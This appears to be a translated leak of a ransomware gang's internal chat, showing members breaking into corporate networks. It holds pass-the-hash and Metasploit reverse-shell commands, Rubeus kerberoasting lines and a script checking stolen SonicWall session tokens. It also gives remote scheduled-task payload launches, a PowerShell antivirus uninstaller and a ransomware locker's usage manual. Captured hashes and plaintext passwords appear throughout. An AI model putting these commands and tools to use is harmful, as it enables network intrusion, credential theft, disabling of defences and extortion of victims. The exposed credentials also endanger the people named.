or climb the rdp through the hash `t !! but for this you need to bang this `reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f` but it too needs 445, for authorization
wmiexec.py powera
although fuck you have no admin rights, you can not get into or climb over the rdp through the hash
then look for another server where 445 to 17.250 will be available
but session does not come
intinet is and the domain is even pinged
inet no?
if you run kmd you run and randll32 not up and that's the point so pick up the session there
`netstat` from the host where you have a session hangs?
no, netstat unchecked
192.168.17.250 there is access by redneck user `admin-nono` (visible above) but the user has no rights there can not let them in
if I understand correctly how it should work to your mind?)
and 192.168.17.250 and the host where your session is not the same host
correctly understood that you checked the 445 port to 192.168.17.250 took netstat from the host where your session hangs?
and how it is closed if : `TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4`
that's the problem, we can not raise the session
as one of the options If you can get in by RDP - get in and raise there session
```
port number -Pn -O -v -p 445 192.168.17.250
ProxyChains-3.1 (http://proxychains.sf.net)
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 20:57 MSK
Initiating Parallel DNS resolution of 1 host. at 20:57
Completed Parallel DNS resolution of 1 host. at 20:57, 0.00s elapsed
Initiating SYN Stealth Scan at 20:57
Scanning 192.168.17.250 [1 port].
Completed SYN Stealth Scan at 20:57, 2.04s elapsed (1 total ports)
Initiating OS detection (try #1) against 192.168.17.250
Retrying OS detection (try #2) against 192.168.17.250
Nmap scan report for 192.168.17.250
Host is up.
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
Too many fingerprints match this host to give specific OS details
Read data files from: /usr/bin/../share/nmap
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds
Raw packets sent: 50 (6.760KB) | Rcvd: 45 (7.334KB)
```
So you should check smb instead of ping
the netstat you took off - it's not from the remote host?
in general, from the host where you have juxtaposed all pings
From the host where you have juxtaposed I can use rdp to connect but the user is not interested in it has two rights there
sneezes or the host is not available from the host where you have juxtaposed
vicitpespes filtered at the network level
who uses the impacket? what could be the problem?
```
proxychains ./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:11ce1cfb0c1e884386990eb5650f3cf6 Administrateur@192.168.17.250
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
|S-chain|-<>-209.222.98.79:48-<><>-192.168.17.250:445-<--timeout
[-] [Errno Connection error (192.168.17.250:445)] [Errno 111] Connection refused
```
port is open on the host
```
:\Users\admin-nono>netstat -ano
Connexions actives
Proto  Adresse locale  Adresse distante  État
TCP    0.0.0.0:80      0.0.0.0:0         LISTENING  4
TCP    0.0.0.0:135     0.0.0.0:0         LISTENING  756
TCP    0.0.0.0:443     0.0.0.0:0         LISTENING  4
TCP    0.0.0.0:445     0.0.0.0:0         LISTENING  4
TCP    0.0.0.0:3389    0
```
open aha
if port 135 is open - put the token through the mimic in memory and get into the mikechek
ports open or the Windows hangs, if node would block it would immediately write an error but it hangs long
node blocks the reason? port is closed or what?
I say the psec does not work here
smb/psexec
```
/pentest/exploits/framework3/msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.32 LPORT=443 RHOST=192.168.1.20 SMBUser=Administrator SMBPass=aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd E
```
impacket wmiexec google
well fuck me)
from my virtual machine tried to put on mimic, but when you log on psec the session hangs and hangs and hangs
just mfc or ermiexec the cob, work without it
and in ermiexec the cob?
```
pth [DOMAIN\user] [ntlm hash]
```
no, what is this tried?
trabh, nss have local admins, but no domain admins where these locals go, no admins go, there's a servak, there are domainadmins hanging there, but there local admin we have only hash, and it doesn't open by hash session, hangs and hangs for a long time but it's possible to get in there not as a local admin on the rdp. there may be a way to have a legitimate hash admin?
no rights to sue the lsas
the network is working network nod32
yes if 2fa is worth it can fly at once
many
maybe I'm wrong, sonic logs do not know
no generally I threw - but it sticks, on this token and try to come in
check the username and password are?
if someone has suggestions for automation - write too, I smell in my spare time
perepeylaet under everything, someone somehow write back later how it worked in ls
zvhhitech
ad_users >objectSid:
hello all. where in ad info writes the domain seat for golden ticket?
guys who worked with ovh.com; export the box or migrate history to another server interested in
on the wine will - I will knock down eh
`./check-sonik [site.com] [path to sessions.json]` at the end will output sessions with cookie tokens ready, no need to do btoa, here's an example:
```
User: jasmijn.maertens Password: Jmij310s455172 B64 token:MXJ4UHpXSXRGVVUxrRFV5a2U1aU1GRnNXZG5FZEVCSkVNMNMldJU3dWM2I4QT0=
```
We do a kerberoasting attack via VPN from a NOT domain machine, having VPN cres
```
kerberoast remote from non-domain machine with domain user creds:
1. Rubeus.exe kerberoast /dc:wesads15.wes.local /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt /creduser:domain.local\username /credpassword:UserPass!
Asreproast remote from non-domain machine with domain user creds:
2. Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt /dc:dc.domain.local /creduser:domain.local\username /credpassword:UserPass!
```
As you can see we are doing the same as in the usual attack, we just add 3 new attributes:
/dc: - specify the domain controller
/creduser: - username of the domain user we are launching from domain user login and password from which we start
/credpassword: - password of the domain user from which we start
- I will just do it once, why don't you add the build with examples of startup?
```python
import os
import sys
import requests
import json
import time
import threading
import base64

# usage: script.py <site> <path to sessions file>
main_url = sys.argv[1]
file_uri = sys.argv[2]
print('Site: ' + main_url)


def checkToken(token, user, password, domain):
    global listOfUsers
    base64_token = base64.b64encode(token.encode("utf-8")).decode("utf-8")
    portal_url = 'https://' + main_url + '/cgi-bin/portal'
    headersData = {
        'Cookie': 'swap=' + base64_token + '; SessURL=https%3A%2F%2F' + main_url + '%2Fcgi-bin%2Fwelcome',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0',
        'Content-type': 'application/json',
        'Origin': 'Origin: https://' + main_url,
        'Referer': 'https://' + main_url + '/cgi-bin/welcome',
        'Accept-encoding': 'gzip, deflate, br',
        'Accept-language': 'en-US,en;q=0.5'
    }
    print('Check user: ' + user)
    x = requests.get(portal_url, headers=headersData, verify=False)
    if x.status_code == 200:
        # an empty body means the session cookie was not accepted
        if x.text == '':
            print('Bad')
        else:
            listOfUsers += 'User: ' + user + ' Password: ' + password + ' B64 token:' + base64_token + '\n'
            print('Good :' + user)


# each entry is a space-separated line: token, <skipped>, user, password, domain
json_array = json.loads(open(file_uri).read())
thread_list = []
listOfUsers = ''
i = 0
for item in json_array:
    i += 1
    item = item.split(' ')
    thread = threading.Thread(target=checkToken, args=(item[0], item[2], item[3], item[4]))
    thread.start()
    thread_list.append(thread)
    # pause after every 10 threads
    if i % 10 == 0:
        time.sleep(5)
[thread.join() for thread in thread_list]
print('\n\n\n\n\n' + listOfUsers)
```
scan the subs, see what services are running
you can macro-assemble the dossier from username to username. mail carefully on your free head you can read
Soon we'll hire droops, they would organize ventry points in the office))))
if there is no choice, why not)
maybe see who is an IT designer how to write, create a domain similar and write in his style
but it is not worth it probably - there was a mail to the IT director from him wrote to some lady who was scanned by public companies that she is 30-40 years old asked to set up a timeweaver id pass went in, started palaud email in the spam filter put and monitored but palsy at some point
Are there any other possible options for this problem?)
I tried to connect to the mail, some mails do not fit creeds, and where they fit 2fa on the phone is, rdp added, but do not connect, even I do not know what else to try
found the input mail, but alas do not fit creeds
```
Unable to verify client certificate
```
sonicwall i have a problem with it?
@Bug let's give it to me and there should be ok everything)
will try to reinstall it, strange behavior
virtualka
http://imgur.com/KxqQ8yh.png
are you on the deck or on a computer?
and the disconnect did not make a pidpeck, i did reboot the pc, i turn on and there HE, running with the account network i got hooked up, i must be busted
yes wanted without a reboot
disconnect from the autorun and reboot?
well everything turns out, the network has absorbed you, you're part of the network, the fuck you disconnect)
it again raises the process
just not stop services, processes kill, and the service does not give a fuck
well i told you, the button disconnect is not active
does not allow the system to cut it too, and the tin or reinstall or reopen the process then I do not know))
the system processes it enabled because no access and app blah
why?
i can't disconnect it from the user or is it a system
csmd need to kill the process
how to close the fucking sonicqual extender? no disconnect button, it is inactive, the ecite does not come out, but hides the current, then i turn it on and it works again, processes from the system, the user can not exit, what the fuck)
bingo
try to get into the mail with the same cres
yep
specified their domain
sabysdomain.com - their domain?
ah, they have this: A temporary password has been sent to your domain.com address. Please enter it below.
is not explicitly stated that the mail, just the domain address, but in theory should the mail?)
2fa code sometimes arrives at the post office
subdomain with mail find and take out from there the code and all ok it works if it arrives at the mail
Through the email to the connection to the VPN?
Or try to read the soap as described: "take off the subdomains of the external domain and try to find the mail"
through the soap nest tried
through the soap?
2fa on vpn no connection ?
yes it seems local) they are lit, 192.9.201.50 192.9.201.93 192.9.203.110
tried and .local and .com does not help, and there if rdp worked, I think any domain could write it would give out that the creed is incorrect, but here is just no connection to rdp
Here guys, tell me how eset file security quits?
dcsync is a fucked up way to go either way)
and sofos is storing the winndogs? it's like just against malware?
how quiet is it to do dcsync on specific users with sofos on dk?
yeah, thanks a sec, i'll try it now
@Andy also can remove subdomains and see some Citrix / RDWeb /
guys, salaam Does anyone have a poc CVE-2019-0543 can't find it on google,
try to read my mail
remove subdomains external domain and try to find the mail
that you have such an ipak 192 9 201 93 ? it's external and will be clinging to the DC on the idea
domain.com
domain.мocael try to specify
was together with a sonic in the file, already and random ran them)
can RDP closed, where do Ipas take?
who faced
random overran already ips RDP, not one does not connect
Hi all! Tell me about Sonic, in the web when you come in no rdp, I create a bookmark
Vapo I had such a thing, I created a virtual and it raised without problems
Yes, can die, but better check.
nah, there token after a while only can, then all? Through the session tried? As I think the credential initially we have the correct, but there is a limitation to connect, no one encountered?
Trouble is, there is a sonicwall to it 6 Credits, when you connect to webmorda long processing is (a couple of minutes) and the result gives out that the creed incorrect, and if you specify the same login but change the pass to at least 1 character will issue that the wrong creed almost immediately without waiting a few minutes.
:)
2 yes understand the inventory and disk, disk (2) on the logging of things to press?))
to remove the replica reliably from the center, which of the buttons to press?
1. Control Panel -> Internet Options -> Advanced (tab) -> Security -> mark only "Use TLS 1.1" and "Use TLS 1.2"
2. Control Panel -> Internet Options -> Security (tab) -> Trusted Sites -> Sites put "add this website to the zone:" https://url_ip_site_gateway
the problem is that he netifikat generate ssl 3 and all will go in the settings of the Internet explorer ssl need to put
if we solve the problem - will tell you how to solve it
does not help)
yes, I have this often,
i got the error code -7200 when i connect from the nix client, openfortivpn is ok, but i can't connect from the windows, what's the problem?
has anyone caught error -7200 on fortivpn with valid credentials?
how to check whether the entripoint is "standard" - run it via randl32 without the argument of entripoint, if it starts, it will not go through StartW
you need a dll with a standard entripoint, like EntryPoint so the print spooler can load the dll as a driver at all
bo only fixed the error that now everything ok writes
http://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html did for this manu
as an option here offered to bring down the dll with the command to add local admin but I have not yet normally tested but in my case StandWhich does not matter should come session with elevated privileges
entry point in the dll what should be
`lpe_cve_2021_1675`
and in Beconedell should be called lsass.dll on Target, put your dll on the path C:\Users\Public
with koba please send files and How did you do it) thanks a lot.
Now it says 0 and everything is done and working.)
Yes, thanks.)
"File Not Found" turns out to be the error. It's a Windows error: google the list of standard Windows error codes and try to guess what it doesn't like.
LPE I haven't tried, only ... to the question where not all of it was tested, of the type "it's complete", and two errors I don't know what, and in fact nothing failed.
Please post in PM whoever managed to successfully perform the attack `CVE-2021-1675 / CVE-2021-34527` PrintNightmare. Need tips.
Tell me how to move with the creds under which I dumped / logged into the SQL databases. With these creds the SQL DB didn't get caught for a long time, then I had to dump them and this shit came out, guys, hello:
```
Msg 976, Level 14, State 1, Server TransSQL1, Line 25
The target database, 'Bol', is participating in an availability group and is currently not accessible for queries. Either data movement is suspended or the availability replica is not enabled for read access. To allow read-only access to this and other databases in the availability group, enable read access to one or more secondary availability replicas in the group. For more information, see the ALTER AVAILABILITY GROUP statement in SQL Server Books Online.
```
Anybody got a Cobalt with clean payloads?
A pre-built exploit for a remote code execution vulnerability in VMware vCenter (CVE-2021-22005) is now widely available, and cybercriminals are taking advantage of it. Unlike the version posted on the Internet at the end of last week, the new version of the exploit can be used to open a reverse shell on a vulnerable system, allowing the remote execution of arbitrary code.
The session after the jump, the process it created: under which process was the session?
There were NAS and NetApp shares from three different servers; one didn't have AV, two had AV?
I meant that after the local drives it goes to the network, but it just shut them off. Not even sure if it's a bug, just a "nuance".
Injecting the locker through a session on the server for some fucking reason shut down all the drives. The mount was via token. Why did this happen?
@all does anyone have a current list of crypto URLs (exchanges, web wallets, etc.)?
Does anyone have a free hard disk with Patty on board? I'll send it to decrypt.
I'll try to decrypt it first thing. Can I try to decrypt it first thing?
```
[*] Started service listener on 173.232.146.32:445
[*] Server started.
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:df4cc93564883530f00c92be1333edfc
NT_CLIENT_CHALLENGE:01010000000000002c4b97d25085d601a70b92049be339e400000000020000000000000000000000
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:c5afc76c2d09ad6c7ce13f420b2ec61a
NT_CLIENT_CHALLENGE:01010000000000003264c3d25085d6019ce5ca50c8b5de4400000000020000000000000000000000
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:fd5be12ff64b685d4aa74e26ad3947b1
NT_CLIENT_CHALLENGE:0101000000000000893ed5d25085d601f1f9d3719c7319f700000000020000000000000000000000
```
What's the answer in the log?
I don't know what's in the log. It's a little fucked up. It's complicated. But it's broken.)
I see the answer. Now there's something in the log?
So I tried to authorize to it:
```
beacon> shell dir \\173.232.146.32\aksdjaklsdj
[*] Tasked beacon to run: dir \\173.232.146.32\aksdjaklsdj
[+] host called home, sent: 63 bytes
[+] received output:
The user name or password is incorrect.
```
Now I checked and went on: when I specified the IP first it didn't come off; when I didn't specify the IP first, the server started.
Maybe you don't have root?
Log, please.
Ok, then I'll look at what's up.
Cobalt isn't taking port 445 (fuck, and I have Cobalt and MSF side by side).
The SMB policy allows you to do so. Just generate it and spread it out in a share, 10-15 of them.
And if a hash comes again, do shell dir \\YOUR_IP_WITH_MSF\aqqdj
Bring up this module near me.
MSF at hand? Start the listener on Responder, quick.
https://habr.com/en/company/pentestit/blog/337390/
Happy SE.
```
beacon> shell dir \\172.93.110.126\c$
[*] Tasked beacon to run: dir \\172.93.110.126\c$
[+] host called home, sent: 54 bytes
[+] received output:
The network path was not found.
```
Here's the output; do it simply.
Specify the IP of the session?
What output?
shell dir \\172.93.110.126\c$
How do I throw the shortcut?)
Do this: then in the decrypt, on the necessary networks, the hash will come; and if the person opens this share through Explorer, you throw a shortcut and you won't need to catch the user, right?
Although you can throw shortcuts, that's also a so-so variant...
Yes, I've tried everything on it, but there's a question of implementation and experience. To practice, honestly? Not worth it, in my opinion. Turn around.)
60 machines, 4 servers, 12k revenue. What to do with this?
Ugh.) 1. Smoke LPE. 2. Look towards the web: run Acunetix through socks in the local network and upload. 3. Raise privileges via MSSQL from two machines.
SeChangeNotifyPrivilege SeShutdownPrivilege SeChangeNotifyPrivilege SeUndockPrivilege: getprivs, not admin.
```
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are TRIDENT\since
```
Exactly getuid?
User. No problem to bypass UAC via schtasks inside localhost, like if you have admin.
Didn't try to decode in base64 the command that would bypass it.
getuid works. UAC. Forgot to specify: only from a user.
The server you got to: do you have SYSTEM rights?
The shares don't lead anywhere, there's nothing interesting on them. 52 passwords were pulled from browsers. I ran smb_login and found 4 passwords for 4 accounts. Of them 1 account is more or less, which only fits the server I was already collecting everything from. Kerberoast doesn't come off. The group is empty. Vulnerable to MS17; as for adding a user: no. Stas doesn't work.) Standard elevations (elevate too). Also tried brute-forcing passwords: fuck. No restrictions on the number of attempts. What do you advise?
I'll write now to the group with the network, so as not to litter here.
Tell me what you're going to brute force there; send me the network.
I'll get so fucked if there are a lot of users, i.e. I specify a specific user and a file with a pool of passwords, right?
Brute force by USERPASS_FILE.
And I have a pool of accounts and a pool of passwords, and fuck knows which password fits which account.
Yes, and if hash: user LMhash:NTLMhash etc.
So the userpass file, as I understand it, contains a username and its password on one line: Vasya 123
Here it was turned; the script is better, not smb_login.
Yes, it is always best to use USERPASS_FILE :) And then the SMB smart brute-force in general.
People, information for reference: I did a brute force in MSF through smb_login with a pool of passwords and logins, i.e. among other settings I pointed to two files, one with logins, the other with passwords. It turns out you can't do that, because it's unnecessary alerts.
Thank you.
1jobs
And how do I stop the Cobalt?
https://github.com/tevora-threat/PowerView3-Aggressor Might come in handy for someone.
Yeah, interesting.
Haven't checked it out, but it's an interesting topic.
https://github.com/gloxec/CrossC2
:handshake: goodnight :hand_splayed: see you all tomorrow.
Bye all. See you all tomorrow.
Waiting for 15. The human factor will always remain. On the vectors I gave a very small base.))))
@steven it is already LPE, they did not show it.)
Ok, tomorrow.)
@alex bring a specific case for discussion, describe in detail what you did, what did not work, with what rights and so on.
Which give the substitute DLL can see the services of the other; how to go from this machine without a license, is that the only way?
From the user, and everything you pull off in the PID jump. I realized that in MSF; how to do it right I showed you.
I mean the shares aren't pulled off; what to do with them in general; the networks, because from a user there is no session, nothing, no share is pulled off.
Friends, I plan to leave soon for today. Please tell me your impressions, problems you see, ideas to discuss.
Competence * I don't have enough for myself to do a normal manual; here rozetka's is fucking great, even a child would understand.
The zone of responsibility of teamleaders includes:
1. Giving out cases for work.
2. Teach, advise, instruct.
3. Connect in the process of solving atypical or unprecedented tasks.
4. Help with builds of payloads, persistence in the network and other technical questions concerning the software.
5. Provide the necessary guides and manuals.
Guys, can you give more cases according to point 1? Manuals, etc. I'd really like to do it by example, or at least look at Google.) rozetka
Banal carelessness: admins write creds in the comments.
No, the human factor will always be.) =)
Michael, in my opinion you already have a problem, huh? =0
With each year the screws are tightened. Alter, you as a seasoned wolf, tell me, does it become more difficult to pick up every year? Or is it a myth?
I have no problem with it; I gladly listen to all the ideas / suggestions etc. At the end of the day I have a small meeting for this channel, in an hour here, to discuss all the ideas / questions / problems.)))
Ok.) Maybe something useful will pop up, I just throw out some ideas, generating.
Michael, you can download a cracked web scanner, run it via socks and point it at the local IPs.
All, eh. Where is it easier? Who are you going to hire? =)))
I did it today, one command worked.
If you don't understand it, don't bother. Why spend thousands of hours if there's a ready-made one? That's why small networks are given to beginners in the beginning. Even the word hello is a template.
Michael, you just need to get into one area and work it out. You've been told on the web what's making your brain melt. Exploits are effective, but you need to work in one direction and then switch to another...
Well, how the fuck does it work? The "top" don't fuck with skeletons and instructions.)
It's just fun to finish a web to the end. It's like with a chick, it's interesting to fuck up the top one.
Today it was only a ruler, what's there to strain about.
afk 10 min
My brain melts, men; since school I haven't strained so much.)
Just coincidentally.
Michael, you've just had a couple of networks fall so far. No big deal. =)
Well, it's also logically clear: no need to make noise in a bunch of streams, no need to generate dirty payloads. I did not know that; I think the beginners here also did not know it all, and move.
In large networks they give you alerts automatically, and within an hour they cut you out, or else decide.
My friend, not a skeleton but a template. In small networks they don't follow it.
What other skeleton do you want to see?
In a normal network you'll get kicked out fast, and it's just as logical: no need to make noise in a bunch of threads, no need to generate dirty payloads. You need a DLL which should be checked once every 2 days for randomness on the target AV. Anyway there is a general "instruction"; you just need experience...
Large; maybe we make a general instruction on what you can and cannot do with large networks?
Everything comes with experience, but I already understood that in my case I can't do fat networks with one person. I can reduce the load on the network, is there logic in that?
Rattling too long. It's clear the fucking hand isn't shaking yet.)) And what did you do before this?
Who has any thoughts so they won't betray us... rap)
Guys, already the second fat network blitzing.
New school is lilkristall, ogbudda :smile: new school rules)
havan :joy: rap; in an hour we will return to it, huh?) rock or rap?
I suggest everyone discuss a serious question, in case you haven't seen it.)
Start a binary on a remote machine through SCHTASKS from Cobalt Strike. We put it at \\remote-hostname123\c$\ProgramData\srvhost.exe
1. Creating a task with SCHTASKS (SYSTEM context):
```
shell SCHTASKS /s remote-hostname123 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\srvhost.exe" /sc ONCE /sd 01/01/2021 /st 00:00
```
1.1 If all is well, in response we see: [+] received output: SUCCESS: The scheduled task "WindowsSensor15" has successfully been created.
2. Starting the task:
```
shell SCHTASKS /s remote-hostname123 /run /TN "WindowsSensor15"
```
2.1 In response we see: SUCCESS: Attempted to run the scheduled task "WindowsSensor15".
At this point the session should arrive. If it does not come, there are several options: no Internet, binary burned, firewall.
3. Deleting the task:
```
shell schtasks /S remote-hostname123 /TN "WindowsSensor15" /DELETE /F
```
SUCCESS: The scheduled task "WindowsSensor15" was successfully deleted.
There is also a user-context variant.
It works by specifying domain\login + password. It's all the same:
```
shell SCHTASKS /s 192.168.97.23 /U "domainad.com\ralexand" /P "Password123" /RU "domainad.com\ralexand" /create /tn "WindowsSensor1" /tr "cmd.exe /c C:\ProgramData\x64.exe" /sc ONCE /sd 01/01/2020 /st 00:00
shell SCHTASKS /s 192.168.97.23 /run /TN "WindowsSensor1"
shell schtasks /S 192.168.97.23 /TN "WindowsSensor1" /DELETE /F
```
!!! Don't forget, after getting a spawned session or injecting into a process, to kill your process and delete the binary you came in with. This way the payload will live much longer.
I will check it on the network in the morning and let you know.
If I am updating ... and then updating successfully and then forcing the update at once, it will ask for a policy update. I just did 1v1 but it did not update like you said. But when all PCs were turned on, gpupdate /force worked.
In the manual you threw it's the same and it says so.) In the last case I did a GPO to disable Defender, then gpupdate /force in cmd and checked 3-4 servers; everywhere it wrote that the Defender program is disabled.
GPO. @red on all PCs? You checked it straight?
But thanks guys, no longer relevant.) Got it.
gpupdate /force: do it on the DC and everywhere else is updated immediately? Or does the result come through the GPO in an hour and a half?
All right. Well, to make it quick, gpupdate; why on every machine? You do it from the admin on the DC where you work with the GPO, and that's all; the timing is 90 minutes, or wait 1.5h, the default timing for the update. I have not checked this point; then the policy is updated, this is the setting that you gave in the screenshot, and everywhere Defender is extinguished.
gpupdate /force should be done on each machine.
Windows Defender turns on just when a third-party AV is disabled; first the third-party AV, then disable Windows Defender through the GPO, yes.
The question: how to properly organize the shutdown of these protections? First a third-party AV, then through the GPO?
Guys, we have a network with FORTI AV ENDPOINT on board. Access to the control panel is available. Connected machines simply disconnect: clients are not active (waiting for connection), but Defender hangs.
VasyaPypkin @Air pour, ok; here, fill the data into the generalinsulation.com folder and let me know how it's done:
```
172.82.162.66 admin 3cT26dDrDCwS ftp 21 port
```
Waiting for him. I know he has already got it, but I do not. And when will Alex and I be given the decks and servers for MSF? We are in suspense? Didn't get it. A month of silence?
Don't flood this board with questions! Any technical questions write in personal; I'll duplicate here then as question-answer.
WARNING: Everything described in this channel may not be distributed, copied or published on any third-party resources.
Things to remember and know.
1. A separate build is always generated for each network, and you need to request it by calling @alter in the conf.
2. In the standard package, the build is given as an archive which contains an .exe file and two .dll files of different bitness for fileless launch via Cobalt sessions. At the moment fileless startup bypasses the vast majority of known AV/EDR systems; no loss in speed is noticed.
Startup parameters:
-m [all/net/local]
all - encrypt everything (default)
net - encrypt network resources only
local - encrypt local files only
example usage: lock.exe -m all or lock.exe; lock.exe -m local; lock.exe -m net
launch example: lock.exe -h C:\hosts.txt
-nomutex Disables mutex protection against double starting.
-size [10/15/20/25/30/35/40/45/50/60/70/80] This parameter defines how much % of the file will be encrypted (by default 50%); the file is encrypted in different places in chunks.
At the same time databases are 100% encrypted and VM files are 20% encrypted regardless of the value of the parameter.
example: lock.exe -size 35
-p [path] If this option is used, the locker will encrypt files in the specified path. It is forbidden to start the locker in normal mode until the specified path is processed.
example: lock.exe -nomutex -p C:\path; lock.exe -nomutex -p C:\path2; lock.exe -nomutex -p \\host\path
-log [path to log file] Enables error logging. Example usage: lock.exe -log C:\log.txt
All parameters can be combined with each other; the order is not important.
Running as a DLL through Cobalt Strike: put the files inject.cna, massinjector.cna, inject_x86.o and inject_x64.o in the same folder. Load the inject.cna file: cobaltstrike -> script manager -> load.
An example of running within a single machine where there is a session: mandllinject c:\path\locker.dll. Pass the arguments in quotation marks: mandllinject c:\path\locker.dll "arguments here"
Example of a single run on X machines with a session: select the necessary sessions "in a batch", right-click and choose dllinject from the menu. In the dialog box that appears, specify the paths to the locker DLL of the required bitness and the arguments (if any are required) and confirm.
NOTE: It is forbidden to start the locker in normal mode until the specified path has been processed. PLEASE NOTE this is due to the inclusion of -nomutex!!!
What does this mean? It means that you can run the locker with -nomutex any number of times with a path, but there must not be a running locker process WITHOUT a path until the "specified" path is fully processed.
Remember that the weekend locker needs a different convention.
Anybody who needs a session for SonicWall's 2FA bypass, write now and let the teamleaders know what's what. If you have a problem with SonicWall, you'll have to get it right away; if you have a problem with SonicWall in the meantime, write.
On Dyncheck now check with the whitelist.
Because with full Internet exposure payloads leak and detections come quickly. In the whitelist add the IPs of the pads + the Cobalt server; add 3 IPs (Cobalt + 2 pads, which we usually have). Check that the session comes and works, but the payload won't leak.
When Cobalt gives an error and an error code, you need to know more details. Guys, remind me please, how do you look at the error text in Cobalt?
5bRSiB can publish: +upload 5bRSiB
I was able to connect via webhop, but Forti still says no access to the webhop server.
username 0mpgreco domainname DOMAINNT password Marilyn1414
username 0mslav domainname DOMAINNT password Bblucas2
0mycarri domain admin username 0mycarri password Wukong55
I got it, thanks for the tip.
Any hoster actually.) Where can we get a dedicated server from their region? Like Canada; better even look at a server which is directly in their state.
Aha, right. Maybe a dedi from their country is needed as a bypass.
I don't know what it is.)
The regional thing, I know what it is; there's a problem with the connection. First time I've met this: like, one cred fits, but there's an error during authorization, as if they have set an additional check on some parameter, like authorization not only by login, maybe by MAC or IP. I remember at work long ago it was like that....
And in the same groups, look at other users and their hashes; look in which groups the user is who was valid on the VPN earlier.
Hello, there's the NTDS, not small, picking it up by now...
Well, did something come up?
kk, I'll try to pick it up; look at the NTDS.
Forti: there's nothing to re-shoot there; Forti, I'll tighten it, so we will re-shoot.
Well, one person wrote that he was able to solve it when he was given other creds.
Google it; is a real AV needed? I tried it with 7 and 10 with the firewall switched on, so I didn't see that either.
Hmm, maybe an AV should be set; there are some connection requirements.
With the same error, no idea (no, it's not the OS); try it with 7.
@alex try to subscribe: alex879 953 707 c8ez85 let's have a look at it together now.
This FortiClient_6.4.3.1608, before it was
FortiClient_6.2.6.0951. Which client do you have?
I used FortiClient 6.4.3.1606; before that I had FortiClient_6.2.6.0960 installed on my client.
I will check it with Air and I will check it with the client.
No connection to the web. I see what I see: when I pressed, the client opens with the same codes to 80% and then an error. See what's going on there.
I have to finish jumping with Air and will have to work, so press the web and try to go through the VPN.
The codes don't fit. All check; it works, works, works now.
Reschedule; this Cobalt is also not available where the last network did, 104.194.11.92:61214. Maybe there are other Cobalt teamservers where you can connect to work? Where we worked before: 209.222.97.23:38614, and the Cobalt is spun up; waiting until the Cobalt reboots where they worked before.
Hi all.
Hi. @stakan do look in all their merged data for something with the aim of Cyber Excess, Cyber Insurance, Insurance, Cybersecurity Insurance, Cyber Policy and so on... As it turned out, not enough attention is paid to this in the data dumping, so I want to collect "samples".
Gentlemen, help: when there is no central console and there are different AVs, it's not universal; some AVs are not like installed software. Do you think that is a universal solution for removal? Then in the arg for removal goes the GUID. For other AVs I do not know. To start removal you need the ID, which we get in the first line of the code, and then either luck or not; the name is taken directly from the list of installed programs, as it says: Where-Object {$_.Name -like "ENTER AV NAME HERE"}; Write-Host "AV_NAME Uninstall Successful... Continuing"; throw "AV_NAME Uninstall Failed... Exiting"
Case handled. There are 100 servers with Symantec and the payload was in trouble. This solution helped.
So this is analogous to a GUI uninstall, no?
Uninstalling Symantec via PowerShell. Requires a reboot, but 3-5 minutes after starting this code it removes it and you can jump on the SMB listener and start the locker.
This is without the password.
```powershell
$SEP_GUID = Get-WmiObject Win32_Product | Where-Object {$_.Name -like "Symantec Endpoint Protection"} | Select-Object -ExpandProperty IdentifyingNumber
#Uninstall SEP - All versions. - Wait for uninstallation to complete
$SEP_arglist = "/uninstall $SEP_GUID /qn"
If ($SEP_GUID -ne $null){
    (Start-Process msiexec.exe -ArgumentList $SEP_arglist -Wait -PassThru).ExitCode
    If ($LASTEXITCODE -eq 1){
        Write-Host "Symantec Uninstall Successful... Continuing"
    }
    ElseIf ($LASTEXITCODE -ne 1){
        throw "Symantec Uninstall Failed... Exiting"
    }
}
```
@rozetka wrote in personal.
Who's online? Hands needed. Urgently.)
Who has a Cobalt with a payload that Symantec [doesn't catch]? URGENT
For those who need to work with SonicWall through browser sessions. Using a web browser to access:
```
- take the session from the script output, e.g. "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg="
- open the browser in incognito mode, open the developer console (JS console)
- encode the session ID in base64:
  >> btoa("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
  "NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
- type in the URL https://target (redirects to https://target/cgi-bin/welcome)
- go into Application / Cookies in the console, add the cookie swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=
